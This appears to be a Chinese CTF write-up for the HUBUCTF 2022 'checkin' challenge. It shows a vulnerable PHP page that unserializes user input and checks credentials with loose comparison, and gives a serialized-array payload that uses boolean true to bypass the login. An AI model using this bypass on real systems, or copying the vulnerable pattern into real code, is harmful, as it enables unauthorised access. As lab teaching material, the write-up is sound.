[HUBUCTF 2022 新生赛]checkin
2023-12-29 10:41:48
[HUBUCTF 2022 新生赛]checkin wp
进入页面,代码如下:
<?php
show_source(__FILE__);
$username = "this_is_secret";
$password = "this_is_not_known_to_you";
include("flag.php");//here I changed those two
$info = isset($_GET['info'])? $_GET['info']: "" ;
$data_unserialize = unserialize($info);
if ($data_unserialize['username']==$username&&$data_unserialize['password']==$password){
echo $flag;
}else{
echo "username or password error!";
}
?>
一开始看得有点懵,反序列化题怎么没有类呢,然后就在找类在哪,没找到。后来看了大佬的 wp 才理清了思路。
代码分析
注意看反序列化之后的值赋值给了 $data_unserialize
,按常理来说,$data_unserialize
应该是个对象,但假如是这样的话,后面这个调用方式就让我看不懂了:$data_unserialize['username']
,难道说这是在调用 $data_unserialize
对象中的 username
属性?PHP 有这种调用方式吗?看完大佬的 wp ,发现这里要反序列化的应该是数组才对,这样用键值对的方式调用数组中的值才合理。
除此之外,本题还有一个点,提示中有这样一句话:
include("flag.php");//here I changed those two
一开始不理解,后面发现这句话指的是在 flag.php 文件中修改了 $username 与 $password 。这样我们就不知道用户名和密码了,考查的是 PHP 的弱比较。
PHP 关联数组
普通的 PHP 数组(即数值数组):
$cars=array("Volvo","BMW","Toyota");
键从 0 开始:
$cars[0]==="Volvo";
$cars[1]==="BMW";
$cars[2]==="Toyota";
PHP 关联数组:
$age=array("Peter"=>"35","Ben"=>"37","Joe"=>"43");
自定义键名:
$age['Peter']==="35";
$age['Ben']==="37";
$age['Joe']==="43";
PHP 弱比较绕过
可以参考:PHP弱类型比较总结
在弱比较中,布尔值 true 和任何值弱比较都相等,除了 0 和 false 。
这是因为在 PHP 弱比较时会发生类型转换,若一端为布尔类型,另一端为其他类型,在转换时会将其他类型转换为布尔类型,而在转换的时候,非 0 为 true ,0 为 false 。true 不等于 false 。
因此,将数组中的值全部设置为布尔值 true 即可。
payload
构造如下代码:
<?php
$demo=array("username"=>true,"password"=>true);
echo serialize($demo);
?>
输出结果:
a:2:{s:8:"username";b:1;s:8:"password";b:1;}
这就是最终的 payload 了。
拿到 flag :
文章来源:https://blog.csdn.net/m0_73612768/article/details/135284524
本文来自互联网用户投稿,该文观点仅代表作者本人,不代表本站立场。本站仅提供信息存储空间服务,不拥有所有权,不承担相关法律责任。 如若内容造成侵权/违法违规/事实不符,请联系我的编程经验分享网邮箱:veading@qq.com进行投诉反馈,一经查实,立即删除!
本文来自互联网用户投稿,该文观点仅代表作者本人,不代表本站立场。本站仅提供信息存储空间服务,不拥有所有权,不承担相关法律责任。 如若内容造成侵权/违法违规/事实不符,请联系我的编程经验分享网邮箱:veading@qq.com进行投诉反馈,一经查实,立即删除!